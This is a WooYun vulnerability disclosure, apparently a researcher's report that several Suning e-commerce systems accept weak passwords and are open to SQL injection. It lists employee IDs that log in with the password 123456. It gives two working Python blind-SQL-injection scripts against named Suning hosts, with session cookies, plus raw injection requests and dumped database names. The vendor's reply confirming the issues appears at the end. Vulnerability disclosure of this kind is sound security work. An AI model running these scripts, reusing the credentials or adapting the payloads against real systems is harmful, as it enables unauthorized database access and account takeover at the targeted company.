当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156225

漏洞标题:苏宁多个系统存在大量弱口令&SQL注入

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: _Thorns

提交时间:2015-11-27 14:01

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

苏宁多个系统存在大量弱口令&SQL注入

详细说明:

管理补充:该案例中涉及到的注入点历史均有提交和涉及,打包处理
1.http://online.suning.com/console/Service/Console/Index
04040301 123456
11051136
11031760
11078031
11078357
11078571
11051922
11075479
11076380
11077169
11077668
11078031
11078350
11078357
11078358
11078571
10080082
10080355

1.png


2.png


只尝试了几个。
注入:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
'Proxy-Connection':'keep-alive',
'Referer': 'http://online.suning.com/console/Service/supplieradmin/customerIndex',
'Cookie': 'JSESSIONID=4CEBAE01446F679F9024276C9F7F00B6',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}
payloads = list(string.ascii_uppercase)
#payloads = list('T')
print 'start to retrive Oracle user:'
user = ''
for i in range(1,7):
for payload in payloads:
conn = httplib.HTTPConnection('online.suning.com', timeout=60)
params = {
'filterParams': "user_name like '%1%' and ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)),
'page': '1',
'rows': '20',
'sort': 'companyName',
'order': 'asc',
'customerId':'',
}
#print urllib.urlencode(params)
conn.request(method='POST',
url='/console/Service/supplieradmin/pageCustomer',
body = urllib.urlencode(params),
headers = headers)
resp = conn.getresponse()
html_doc = resp.read().decode('utf-8')
conn.close()
#print html_doc
print '.',
if html_doc.find(u'userName') > 0: # True
user += payload
print '\n[in progress]', user
break
print '\nOracle user is', user


3.png

漏洞证明:

2.http://58.240.86.236
访问不了。
http://58.240.86.236/download/
找到一个ios地址
可惜我的设备没越狱,安装不了。

1.png


没办法,扫下目录先。

2.png


居然...可以访问...

3.png


可以8位工号继续爆破。
注入:http://weibo.cnsuning.com/ajax.php?mod=member&code=sel&type=top&province=1&hid_city=

4.png


#encoding=utf-8 
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
'Cookie':' _wbma=weibo.cnsuning.com%7C14353112666246444095519302%7C1435311266624%7C1435736372201%7C1435736405085%7C81%7C3; _wbmc=weibo.cnsuning.com; _wbmb=14357360303501756793251744%7C%7C%7C22;jishigou_YnQbd2_auth=b894Q1QF2ymXvAaat%2BBJ0dwP0InpJNhi3zGtCB30mGyR2Q4BH7uk%2Bf%2F%2FQKxTY%2Bysci6B4luF2L1gMgNn6on8SHIcKw; jishigou_YnQbd2_login_credits=1435736257; jishigou_YnQbd2_sid=DPZcJd',
'X-Forwarded-For':'192.168.121.194'}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'start to retrive Current database name :'
user = ''
for i in range(1,6):
for payload in payloads:
conn = httplib.HTTPConnection('weibo.cnsuning.com', timeout=120)
conn.request(method='GET',
url='/ajax.php?mod=member&code=sel&type=top&province=1/**/and/**/ascii(substr(database(),%s,1))=%s' % (i,ord(payload)),
headers=headers)
resp = conn.getresponse()
html_doc = resp.read()
conn.close()
#print html_doc
print '.',
if html_doc.find('value=41') > 0: # True
#print bb
user += payload
print '\n[in progress]', user
break
print '\nCurrent Database name is', user


3.http://fota.suning.com/
http://bug2go.suning.com/
POST / HTTP/1.1
Host: 218.2.113.254
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.2.113.254/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
formhash=73350ae2&login=1&username=123&password=123

1.png


available databases [3]:
[*] bug2go
[*] information_schema
[*] test

GET /workOrder/workOrderContent.htm?noCache=1448209074131&active=&keyword=1'&pageNumber=1 HTTP/1.1
Host: sws.suning.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://sws.suning.com/console.html
Cookie: _device_session_id=p_035d5322-bebf-43df-a4b0-32eb3078fd91; _customId=s5aac5bb0281; Hm_lvt_bc611aeb03796ac6788544b9a75ff641=1448208897; Hm_lpvt_bc611aeb03796ac6788544b9a75ff641=1448208933; _snma=1%7C144820889823549650%7C1448208898235%7C1448208923889%7C1448208932488%7C3%7C1; _snmc=1; _snsr=direct%7Cdirect%7C%7C%7C; _snmb=144820889825797119%7C1448208932498%7C1448208932492%7C3; _snmp=144820893248587390; __wmv=1448208899.1; __wms=1448210699; authId=siE8C38068EFF3ED6F11FFBE119685A4B8; custno=6132453427; idsLoginUserIdLastTime=653143550%40qq.com; logonStatus=2; nick=65***0%40qq.com; nick2=65***0%40qq.com; ZONE_ID=z-nj1; JSESSIONID=uVnq8S5rDC8J8lkjl4Ec1nBC.master:server-one
Connection: keep-alive


2.png


{"message":"PreparedStatementCallback; bad SQL grammar [SELECT COUNT(*) count FROM T_WORK_ORDER A, SPCU.T_USER_INFO B WHERE A.STATUS = 1 AND A.USER_ID = B.ID AND A.USER_ID = ? AND (A.UUID like '%1'%' OR A.TITLE like '%1'%') ]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR A.TITLE like '%1'%')' at line 1","result":"false"}

修复方案:

版权声明:转载请注明来源 _Thorns@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 14:16

厂商回复:

问题1的系统属于即将废弃的,问题3已经从其他平台知晓。问题2正在确认。

最新状态:

暂无